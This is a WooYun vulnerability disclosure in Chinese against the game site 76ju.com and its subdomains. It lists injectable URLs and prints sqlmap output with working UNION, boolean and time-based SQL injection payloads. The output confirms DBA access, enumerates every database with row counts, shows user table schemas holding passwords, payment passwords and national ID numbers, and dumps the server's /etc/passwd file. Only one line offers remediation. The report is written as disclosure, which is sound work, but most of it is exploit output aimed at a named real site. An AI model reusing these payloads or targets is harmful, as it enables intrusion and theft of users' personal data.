乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-16: 厂商已经主动忽略漏洞,细节向公众公开
主站存在SQL注入,所有的二级游戏平台存在注入,同一个参数!~~~(DBA权限+几十万用户信息泄漏+可读取任意文件)
1、主站存在SQL注入
http://www.76ju.com/?c=ServiceCenter&action=detail&cid=3&id=25
id参数存在注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=ServiceCenter&action=detail&cid=3&id=25) AND 9148=9148 AND (4098=4098 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: c=ServiceCenter&action=detail&cid=3&id=-3901) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b647671,0x4b4353684b524b734163,0x7163676871),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: c=ServiceCenter&action=detail&cid=3&id=25) AND SLEEP(5) AND (7772=7772---[22:58:29] [INFO] testing MySQL[22:58:29] [INFO] confirming MySQL[22:58:30] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL >= 5.0.0[22:58:30] [INFO] fetching current usercurrent user: '[email protected]'[22:58:30] [INFO] fetching current databasecurrent database: '76jutest'[22:58:30] [INFO] testing if current user is DBA[22:58:30] [INFO] fetching current usercurrent user is DBA: Truedatabase management system users [8]:[*] ''@'51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'[*] ''@'localhost'[*] 'root'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'192.168.1.100'[*] 'root'@'27.16.170.223'[*] 'root'@'51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'[*] 'root'@'::1'available databases [10]:[*] 76ju[*] 76jutest[*] information_schema[*] iy6v1[*] mysql[*] performance_schema[*] qq990[*] qq990test[*] qq990test1[*] testDatabase: 76ju+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_userplaygamelog | 13690346 | 上千万用户游戏记录| pre_newcard | 668352 || pre_user | 650856 | 六十多万用户| pre_userpingtaibilog | 302229 || pre_userpingtaibilog_copy | 248959 || pre_z_game_card | 232439 | 二十多万游戏卡| bbs_home_notification | 230412 || pre_payorder | 227347 || pre_payorder_copy | 194752 || bbs_security_evilpost | 176456 || pre_z_card_record | 143342 || bbs_forum_statlog | 93778 || bbs_plugin_auction_message | 70042 || pre_z_charge_username | 51378 || bbs_common_district | 45051 || bbs_forum_threadpartake | 37575 || pre_z_charge_record | 30294 || pre_longnews | 29364 || bbs_common_credit_rule_log | 27465 || pre_log | 26720 || pre_usergetpwdlog | 21056 || bbs_ucenter_memberfields | 18455 || bbs_ucenter_members | 18455 | 将近两万多ucenter成员| bbs_common_member | 18375 | 将近两万多common成员| bbs_common_member_count | 18370 || bbs_common_member_field_forum | 18370 || bbs_common_member_field_home | 18370 || bbs_common_member_profile | 18370 || bbs_common_member_status | 18370 || bbs_plugin_auctionapply | 17884 || pre_gameserver | 12748 || pre_kaifubiao | 12556 || pre_adminaddpingtaibilog | 12318 || bbs_common_onlinetime | 10714 || pre_lhzshd | 9706 || pre_lhzs_prize | 9149 || bbs_forum_post | 7929 || pre_longplus | 6076 || pre_card | 5890 || pre_news | 3939 || pre_paytoolog | 3142 || pre_admincheck | 3123 || bbs_forum_thread | 2764 || pre_cardtest | 2525 || pre_cpsuser | 2146 | 两千多cpsuser| bbs_common_tagitem | 1821 || bbs_forum_thread_moderate | 1693 || bbs_common_connect_guest | 1392 || pre_longplustype | 1292 || bbs_common_stat | 1086 || bbs_forum_attachment | 1040 || bbs_forum_modwork | 921 || bbs_forum_post_tableid | 842 || pre_longnewstype | 796 || bbs_ucenter_pm_members | 587 | 几百ucenter_pm_members| bbs_security_eviluser | 523 | ?| bbs_ucenter_pm_indexes | 446 || bbs_connect_memberbindlog | 440 || bbs_common_member_connect | 435 || bbs_common_credit_log | 423 || bbs_plugin_auction | 423 || bbs_common_setting | 405 || bbs_forum_postcomment | 402 || bbs_connect_postfeedlog | 396 || pre_z_card_type | 361 || bbs_forum_threaddisablepos | 349 || bbs_gamekey_card | 332 || bbs_forum_postcache | 303 || bbs_ucenter_pm_lists | 295 || bbs_common_regip | 274 || bbs_forum_rsscache | 274 || bbs_forum_forumfield | 192 || bbs_forum_forum | 191 || bbs_common_syscache | 189 || bbs_forum_attachment_6 | 164 || pre_game | 160 || bbs_common_tag | 142 || bbs_ucenter_newpm | 132 || bbs_forum_attachment_unused | 131 || pre_hdrecord | 106 || bbs_common_block_style | 103 || bbs_forum_attachment_5 | 102 || pre_link | 102 || bbs_forum_attachment_1 | 100 || bbs_forum_attachment_4 | 99 || pre_lhzs_prize_record | 92 || bbs_forum_attachment_0 | 86 || bbs_common_smiley | 85 || pre_cardstype | 85 || bbs_forum_attachment_8 | 81 || bbs_common_member_crime | 80 || pre_longlink | 79 || bbs_forum_attachment_3 | 77 || bbs_forum_attachment_9 | 76 || bbs_forum_attachment_7 | 71 || bbs_forum_threadimage | 70 || bbs_common_admincp_perm | 67 || bbs_connect_feedlog | 57 || pre_payerrorlog | 56 || bbs_common_nav | 54 || bbs_common_pluginvar | 54 || bbs_forum_attachment_2 | 53 || bbs_gamekey_game | 53 || bbs_ucenter_pm_messages_8 | 53 || pre_cpslock | 53 || pre_plus | 53 || bbs_ucenter_pm_messages_3 | 52 || bbs_common_member_profile_setting | 51 || bbs_ucenter_pm_messages_7 | 51 || bbs_ucenter_pm_messages_0 | 46 || bbs_ucenter_pm_messages_2 | 46 || bbs_common_stylevar | 45 || bbs_ucenter_pm_messages_1 | 45 || bbs_ucenter_pm_messages_9 | 45 || bbs_ucenter_notelist | 38 || bbs_ucenter_pm_messages_4 | 37 || bbs_ucenter_pm_messages_6 | 37 || bbs_ucenter_pm_messages_5 | 34 || bbs_common_banned | 32 || bbs_common_credit_rule | 31 || pre_adminuser | 29 | 管理员| bbs_ucenter_settings | 26 || bbs_common_myapp | 25 || pre_paytype | 22 || pre_remenyouxi | 22 || bbs_common_usergroup | 20 || bbs_common_usergroup_field | 20 || bbs_common_cron | 18 || pre_xinshoulibao | 16 || bbs_common_session | 15 || bbs_home_click | 15 || pre_ads | 13 || pre_lhzs_prize_limit | 13 || bbs_common_plugin | 12 || bbs_home_friend_request | 11 || bbs_common_friendlink | 10 || bbs_common_searchindex | 10 || bbs_common_word | 10 || bbs_forum_medal | 10 || pre_lhzs_prize_money | 10 || pre_lhzshd2 | 8 || bbs_common_admingroup | 7 || pre_plustype | 7 || bbs_forum_typeoption | 6 || bbs_gamekey_gametype | 6 || bbs_home_friend | 6 || pre_paytypebank | 6 || pre_userpingtaibilogtype | 6 || bbs_common_admincp_group | 5 || bbs_common_failedlogin | 5 || pre_gameserverstatus | 5 || bbs_common_admincp_member | 4 | 管理???| bbs_common_statuser | 4 || bbs_forum_bbcode | 4 || bbs_forum_onlinelist | 4 || bbs_forum_grouplevel | 3 || bbs_forum_imagetype | 3 || pre_longlinktype | 3 || pre_newstype | 3 || bbs_common_block | 2 || bbs_common_patch | 2 || bbs_common_report | 2 || bbs_common_template_block | 2 || bbs_common_word_type | 2 || bbs_forum_polloption | 2 || bbs_forum_poststick | 2 || bbs_forum_promotion | 2 || bbs_home_favorite | 2 || bbs_mobile_setting | 2 || bbs_ucenter_applications | 2 || pre_adstype | 2 || pre_fail_charge | 2 || bbs_common_admincp_session | 1 || bbs_common_credit_rule_log_field | 1 || bbs_common_diy_data | 1 || bbs_common_process | 1 || bbs_common_secquestion | 1 || bbs_common_style | 1 || bbs_common_template | 1 || bbs_forum_poll | 1 || bbs_forum_pollvoter | 1 || bbs_gamekey_cardtype | 1 || bbs_gamekey_company | 1 || bbs_gamekey_runtype | 1 || bbs_ucenter_admins | 1 | ucenter管理员| bbs_ucenter_domains | 1 || bbs_ucenter_failedlogins | 1 || pre_linktype | 1 |+-----------------------------------+---------+Database: 76jutest+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| kmy_member | 681204 | 六十八万多成员| kmy_member_copy | 650860 || pre_user | 650856 | 六十五万多用户| kmy_z_game_card | 235520 || kmy_member_login_game_record | 89837 || kmy_operationlog | 15460 || kmy_game_server | 7159 || kmy_news | 2517 || kmy_access | 2421 || kmy_game_charge_record | 1753 || kmy_pay_record | 1685 || kmy_menu | 1386 || kmy_z_card_record | 1362 || kmy_platform_money_record | 799 || kmy_notification | 719 || kmy_game_pic | 551 || kmy_z_card_type | 369 || kmy_kaifu | 340 || kmy_loginlog | 306 | 登陆记录| kmy_z_charge_username | 201 || kmy_z_charge_record | 196 || kmy_game | 160 || kmy_game_old | 160 || kmy_fail_charge | 120 || kmy_tg_link | 112 || kmy_findpwd_record | 96 || kmy_game_leftmenu | 63 || kmy_friend_link | 39 || kmy_pay_type | 23 || kmy_faq | 22 || kmy_user | 14 | 管理员| kmy_pic | 12 || kmy_game_charge_retry | 11 || kmy_tg_member | 11 | 推广用户| kmy_cache | 9 || kmy_single_page | 8 || kmy_role | 6 || kmy_config | 1 |+-----------------------------------+---------+Database: iy6v1+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_game_tj | 9 || pre_plus | 6 || pre_gameserverstatus | 5 || pre_user | 5 || pre_news | 4 || pre_game | 3 || pre_adminuser | 2 || pre_gameserver | 2 || pre_kaifubiao | 2 || pre_remenyouxi | 2 || pre_admincheck | 1 || pre_log | 1 |+-----------------------------------+---------+Database: qq990test+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| kmy_member | 442060 | 四十多万用户成员| kmy_game_server | 4437 || kmy_game_charge_record | 2426 || kmy_access | 1582 || kmy_kaifu | 563 || kmy_loginlog | 252 | 登陆记录| kmy_fail_charge | 154 || kmy_game_pic | 77 || kmy_game | 56 || kmy_friend_link | 39 || kmy_findpwd_record | 38 || kmy_game_leftmenu | 35 || kmy_faq | 22 || kmy_game_charge_retry | 13 || kmy_cache | 9 || kmy_config | 1 |+-----------------------------------+---------+Database: mysql+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| help_relation | 1090 || help_topic | 534 || help_keyword | 485 || innodb_index_stats | 129 || help_category | 40 || innodb_table_stats | 40 || `user` | 8 || db | 2 || proxies_priv | 2 |+-----------------------------------+---------+Database: qq990+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_userplaygamelog | 1453986 | 上百万游戏记录| pre_mask | 681250 || pre_user | 632011 | 六十多万用户| bbs_plugin_auction_message | 86752 || pre_card | 63280 || bbs_home_notification | 48421 || pre_userpingtaibilog | 38529 || bbs_forum_post | 36000 || bbs_common_credit_rule_log | 34300 || pre_payorder | 29023 || bbs_common_credit_log | 27140 || bbs_common_member_profile | 24066 || bbs_common_member_field_forum | 24063 || bbs_common_member_count | 24061 || bbs_common_member_field_home | 24061 || bbs_common_member_status | 24061 || bbs_common_member | 24030 | 两万多成员| bbs_ucenter_members | 23883 | 两万多ucenter用户| bbs_ucenter_memberfields | 21539 || bbs_plugin_auctionapply | 20517 || bbs_forum_threadmod | 11473 || bbs_security_evilpost | 11218 || bbs_forum_thread | 10737 || bbs_forum_statlog | 6494 || bbs_common_onlinetime | 6327 || bbs_forum_threadpartake | 5330 || pre_longnews | 4760 || pre_adminaddpingtaibilog | 2019 || pre_gameserver | 1680 || bbs_common_tagitem | 1642 || pre_news | 1566 || pre_paytoolog | 1422 || bbs_forum_post_tableid | 951 || pre_longplus | 850 || pre_kaifubiao | 711 || bbs_forum_attachment | 656 || pre_usergetpwdlog | 614 || pre_log | 578 || bbs_plugin_auction | 492 || bbs_common_stat | 421 || bbs_forum_modwork | 406 || bbs_common_setting | 397 || bbs_common_member_crime | 317 || bbs_forum_rsscache | 250 || pre_admincheck | 227 || pre_apiorder | 200 || pre_longplustype | 162 || bbs_common_statuser | 134 || bbs_common_syscache | 118 || bbs_ucenter_pm_members | 118 || pre_longnewstype | 115 || bbs_common_block_style | 103 || bbs_ucenter_pm_indexes | 99 || bbs_common_smiley | 85 || bbs_forum_attachment_5 | 83 || bbs_forum_attachment_3 | 75 || pre_link | 68 || bbs_common_admincp_perm | 67 || bbs_forum_attachment_6 | 66 || bbs_common_tag | 65 || bbs_forum_attachment_4 | 64 || bbs_forum_forumfield | 63 || bbs_forum_forum | 62 || bbs_forum_attachment_9 | 60 || bbs_ucenter_pm_lists | 59 || bbs_forum_attachment_1 | 58 || bbs_forum_attachment_2 | 58 || bbs_forum_attachment_8 | 58 || bbs_forum_attachment_7 | 54 || bbs_common_nav | 53 || bbs_common_member_profile_setting | 51 || bbs_forum_attachment_0 | 47 || bbs_common_stylevar | 45 || pre_plus | 44 || bbs_forum_threadimage | 40 || bbs_ucenter_newpm | 36 || bbs_ucenter_notelist | 34 || bbs_forum_attachment_unused | 32 || bbs_common_credit_rule | 31 || bbs_ucenter_settings | 26 || bbs_forum_thread_moderate | 25 || pre_game | 22 || pre_paytype | 22 || pre_remenyouxi | 22 || bbs_common_usergroup | 20 || bbs_common_usergroup_field | 20 || bbs_security_eviluser | 20 || bbs_common_cron | 18 || bbs_common_myapp | 17 || bbs_ucenter_pm_messages_1 | 16 || bbs_home_click | 15 || bbs_common_failedlogin | 13 || bbs_common_pluginvar | 13 || bbs_ucenter_pm_messages_3 | 13 || bbs_forum_polloption | 12 || bbs_ucenter_pm_messages_5 | 11 || pre_cpsuser | 11 || bbs_common_word | 10 || bbs_forum_medal | 10 || bbs_forum_pollvoter | 10 || bbs_home_friend_request | 10 || bbs_ucenter_pm_messages_2 | 10 || bbs_ucenter_pm_messages_9 | 10 || pre_adminuser | 10 || bbs_common_plugin | 9 || bbs_common_regip | 9 || bbs_ucenter_pm_messages_4 | 9 || bbs_ucenter_pm_messages_6 | 9 || bbs_forum_onlinelist | 8 || bbs_ucenter_pm_messages_8 | 8 || bbs_common_admingroup | 7 || bbs_ucenter_pm_messages_0 | 7 || bbs_forum_typeoption | 6 || bbs_ucenter_pm_messages_7 | 6 || pre_paytypebank | 6 || bbs_common_admincp_group | 5 || bbs_forum_poll | 5 || pre_ads | 5 || pre_gameserverstatus | 5 || pre_userpingtaibilogtype | 5 || bbs_common_mailqueue | 4 || bbs_forum_bbcode | 4 || pre_newstype | 4 || bbs_forum_grouplevel | 3 || bbs_forum_imagetype | 3 || bbs_forum_threadclass | 3 || bbs_home_favorite | 3 || pre_plustype | 3 || bbs_common_admincp_member | 2 || bbs_common_block | 2 || bbs_common_cache | 2 || bbs_common_patch | 2 || bbs_common_template_block | 2 || bbs_common_word_type | 2 || bbs_mobile_setting | 2 || bbs_common_admincp_cmenu | 1 || bbs_common_admincp_session | 1 || bbs_common_diy_data | 1 || bbs_common_report | 1 || bbs_common_style | 1 || bbs_common_template | 1 || bbs_forum_post_moderate | 1 || bbs_home_follow | 1 || bbs_ucenter_admins | 1 || bbs_ucenter_applications | 1 || pre_adstype | 1 || pre_linktype | 1 || pre_longlinktype | 1 |+-----------------------------------+---------+Database: qq990Table: pre_user[17 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| chongzhi | char(32) || email | char(40) || lastloginip | char(15) || lastlogintime | int(10) unsigned || mob | char(11) || password | char(32) || paypassword | char(32) || pingtaibi | char(32) || qq | char(11) || regip | char(15) || regtime | int(10) unsigned || sfzid | char(18) || sfzname | char(6) || tgid | int(11) || tgid2 | char(15) || uid | int(10) unsigned || username | char(20) |+---------------+------------------+Database: qq990Table: bbs_ucenter_members[12 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| email | char(32) || lastloginip | int(10) || lastlogintime | int(10) unsigned || myid | char(30) || myidkey | char(16) || password | char(32) || regdate | int(10) unsigned || regip | char(15) || salt | char(6) || secques | char(8) || uid | mediumint(8) unsigned || username | char(15) |+---------------+-----------------------+Database: qq990Table: bbs_common_member[22 columns]+--------------------+-----------------------+| Column | Type |+--------------------+-----------------------+| accessmasks | tinyint(1) || adminid | tinyint(1) || allowadmincp | tinyint(1) || avatarstatus | tinyint(1) || conisbind | tinyint(1) unsigned || credits | int(10) || email | char(40) || emailstatus | tinyint(1) || extgroupids | char(20) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || newpm | smallint(6) unsigned || newprompt | smallint(6) unsigned || notifysound | tinyint(1) || onlyacceptfriendpm | tinyint(1) || password | char(32) || regdate | int(10) unsigned || status | tinyint(1) || timeoffset | char(4) || uid | mediumint(8) unsigned || username | char(15) || videophotostatus | tinyint(1) |+--------------------+-----------------------+Table: pre_cpsuser[13 columns]+----------+---------------------+| Column | Type |+----------+---------------------+| beizhu | char(30) || code | char(18) || gameid | smallint(5) || id | int(11) unsigned || mail | varchar(200) || mobile | char(20) || password | char(32) || qq | char(20) || quanxian | tinyint(3) unsigned || realname | char(20) || status | tinyint(1) unsigned || tgid | mediumint(8) || username | char(15) |+----------+---------------------+Database: 76juTable: bbs_common_member[34 columns]+--------------------+-----------------------+| Column | Type |+--------------------+-----------------------+| accessmasks | tinyint(1) || adminid | tinyint(1) || allowadmincp | tinyint(1) || avatarstatus | tinyint(1) || conisbind | tinyint(1) unsigned || credits | int(10) || email | char(40) || emailstatus | tinyint(1) || extgroupids | char(20) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || lastloginip | char(15) || lastlogintime | int(10) || mob | char(11) || newpm | smallint(6) unsigned || newprompt | smallint(6) unsigned || notifysound | tinyint(1) || onlyacceptfriendpm | tinyint(1) || password | char(32) || paypassword | char(32) || pingtaibi | char(32) || qq | char(20) || regdate | int(10) unsigned || regip | char(15) || regtime | int(10) || sfzid | char(18) || sfzname | char(10) || status | tinyint(1) || tgid | int(10) || tgid2 | int(10) || timeoffset | char(4) || uid | mediumint(8) unsigned || username | char(15) || videophotostatus | tinyint(1) |+--------------------+-----------------------+Database: 76juTable: bbs_ucenter_members[12 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| email | char(32) || lastloginip | int(10) || lastlogintime | int(10) unsigned || myid | char(30) || myidkey | char(16) || password | char(32) || regdate | int(10) unsigned || regip | char(15) || salt | char(6) || secques | char(8) || uid | mediumint(8) unsigned || username | char(15) |+---------------+-----------------------+Database: 76juTable: pre_userplaygamelog[6 columns]+----------+----------------------+| Column | Type |+----------+----------------------+| gameid | tinyint(3) unsigned || id | int(10) unsigned || logip | char(15) || logtime | int(10) unsigned || serverid | smallint(5) unsigned || uid | int(10) unsigned |+----------+----------------------+Database: 76juTable: pre_user[17 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| chongzhi | char(32) || email | char(40) || lastloginip | char(15) || lastlogintime | int(10) unsigned || mob | char(11) || password | char(32) || paypassword | char(32) || pingtaibi | char(32) || qq | char(11) || regip | char(15) || regtime | int(10) unsigned || sfzid | char(18) || sfzname | char(6) || tgid | smallint(5) || tgid2 | char(15) || uid | int(9) unsigned || username | char(20) |+---------------+------------------+
能获取到几十万的数据,就不继续了,自己看吧!~~~2、所有二级网页存在SQL注入列出一部分
http://xsg.76ju.com/?action=detail&id=4117http://jz.76ju.com/?action=detail&id=4043http://sgyjz.76ju.com/?action=detail&id=4093http://zlsg.76ju.com/?action=detail&id=4435http://atxm.76ju.com/?action=detail&id=4292http://tglz2.76ju.com/?action=detail&id=4404http://sgh.76ju.com/?action=detail&id=4393……等等,所有的二级网页游戏都有该id参数存在注入以http://xsg.76ju.com/?action=detail&id=4117进行测试
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=detail&id=4117) AND 9720=9720 AND (2548=2548 Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: action=detail&id=-4436) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170616771,0x5864637342657855776c,0x7165746d71),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: action=detail&id=4117) AND SLEEP(5) AND (5111=5111---[23:03:37] [INFO] testing MySQL[23:03:37] [INFO] confirming MySQL[23:03:38] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL >= 5.0.0[23:03:38] [INFO] fetching current usercurrent user: '[email protected]'[23:03:38] [INFO] fetching current databasecurrent database: '76jutest'[23:03:38] [INFO] fetching server hostnamehostname: '51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'[23:03:38] [INFO] testing if current user is DBA[23:03:38] [INFO] fetching current usercurrent user is DBA: True
3、可以获取任意文件/etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrtkit:x:499:497:RealtimeKit:/proc:/sbin/nologinavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsaslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinpulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinkumiyou:x:500:500:kumiyou:/home/kumiyou:/bin/bashldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologinmysql:x:501:501::/home/mysql:/bin/bash
如上
过滤修复权限限制数据库不要全部放在一起
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)